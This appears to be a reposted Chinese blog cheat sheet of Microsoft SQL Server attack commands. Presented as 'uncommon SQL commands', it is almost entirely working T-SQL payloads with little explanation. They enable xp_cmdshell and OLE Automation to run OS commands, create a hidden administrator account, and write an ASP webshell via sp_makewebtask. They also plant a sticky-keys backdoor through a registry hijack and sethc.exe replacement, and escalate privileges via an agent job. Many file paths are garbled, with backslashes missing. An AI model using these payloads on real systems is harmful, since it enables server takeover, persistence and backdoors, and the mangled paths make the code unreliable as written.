zoukankan      html  css  js  c++  java

  • SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask

    • 开启和关毕xp_cmdshell
    •  
      EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 开启xp_cmdshell
    •  
      EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;-- 关毕xp_cmdshell
    •  
      EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
    •  
      2.
    •  
      xp_cmdshell执行命令
    •  
      EXEC master..xp_cmdshell 'ipconfig'
    •  
      3.
    •  
      开启和关毕sp_oacreate
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 开启
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE; 关毕
    •  
      EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
    •  
      4.
    •  
      sp_OACreate删除文件
    •  
      DECLARE @Result int
    •  
      DECLARE @FSO_Token int
    •  
      EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT
    •  
      EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'C:Documents and SettingsAll Users「开始」菜单程序启动user.bat'
    •  
      EXEC @Result = sp_OADestroy @FSO_Token
    •  
      5.
    •  
      sp_OACreate复制文件
    •  
      declare @o int
    •  
      exec sp_oacreate 'scripting.filesystemobject', @o out
    •  
      exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe';
    •  
      6.
    •  
      sp_OACreate移动文件
    •  
      declare @aa int
    •  
      exec sp_oacreate 'scripting.filesystemobject', @aa out
    •  
      exec sp_oamethod @aa, 'moveFile',null,'c: empipmi.log', 'c: empipmi1.log';
    •  
      7.
    •  
      sp_OACreate加管理员用户
    •  
      DECLARE @js int
    •  
      EXEC sp_OACreate 'ScriptControl',@js OUT
    •  
      EXEC sp_OASetProperty @js, 'Language', 'JavaScript'
    •  
      EXEC sp_OAMethod @js, 'Eval', NULL, 'var o=new ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'
    •  
      8.
    •  
      开启和关毕sp_makewebtask
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE; 开启
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',0;RECONFIGURE; 关毕
    •  
      EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
    •  
      9.
    •  
      sp_makewebtask新建文件
    •  
      exec sp_makewebtask 'c:windows.txt',' select ''<%25execute(request("a"))%25>'' ';;--
    •  
      10.
    •  
      wscript.shell执行命令
    •  
      use master
    •  
      declare @o int
    •  
      exec sp_oacreate 'wscript.shell',@o out
    •  
      exec sp_oamethod @o,'run',null,'cmd /c "net user" > c: est.tmp'
    •  
      11.
    •  
      Shell.Application执行命令
    •  
      declare @o int
    •  
      exec sp_oacreate 'Shell.Application', @o out
    •  
      exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c: est.txt','c:windowssystem32','','1';
    •  
      or
    •  
      exec sp_oamethod @o, 'ShellExecute',null, 'user.vbs','','c:','','1';
    •  
      12.
    •  
      开启和关毕openrowset
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 开启
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE; 关毕
    •  
      EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
    •  
      13.
    •  
      沙盒执行命令
    •  
      exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1 默认为3
    •  
      select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c echo a>c:.txt")')
    •  
      14.
    •  
      注册表劫持粘贴键
    •  
      exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsNTCurrentVersionImage File Execution
    •  
      Optionssethc.EXE','Debugger','REG_SZ','C:WINDOWSexplorer.exe';
    •  
      15.
    •  
      sp_oacreate替换粘贴键
    •  
      declare @o int
    •  
      exec sp_oacreate 'scripting.filesystemobject', @o out
    •  
      exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe';
    •  
      declare @oo int
    •  
      exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:windowssystem32sethc.exe' ,'c:windowssystem32dllcachesethc.exe';
    •  
      16.
    •  
      public权限提权操作
    •  
      USE msdb
    •  
      EXEC sp_add_job @job_name = 'GetSystemOnSQL', www.2cto.com
    •  
      @enabled = 1,
    •  
      @description = 'This will give a low privileged user access to
    •  
      xp_cmdshell',
    •  
      @delete_level = 1
    •  
      EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
    •  
      @step_name = 'Exec my sql',
    •  
      @subsystem = 'TSQL',
    •  
      @command = 'exec master..xp_execresultset N''select ''''exec
    •  
      master..xp_cmdshell "dir > c:agent-job-results.txt"'''''',N''Master'''
    •  
      EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
    •  
      @server_name = 'SERVER_NAME'

    • EXEC sp_start_job @job_name = 'GetSystemOnSQL'
    •  

    -
  • 相关阅读:
    1,JAVA图形
    作业(2)
    作业(1)
    作业
    2.15 (第二次作业)
    60页2.6 (第二次作业)
    1.12 (第一次作业)
    27页1.8(第一次作业)
    26页1.3(第一次作业)
    作业第六次
  • 原文地址:https://www.cnblogs.com/linjincheng/p/9728853.html
Copyright © 2011-2022 走看看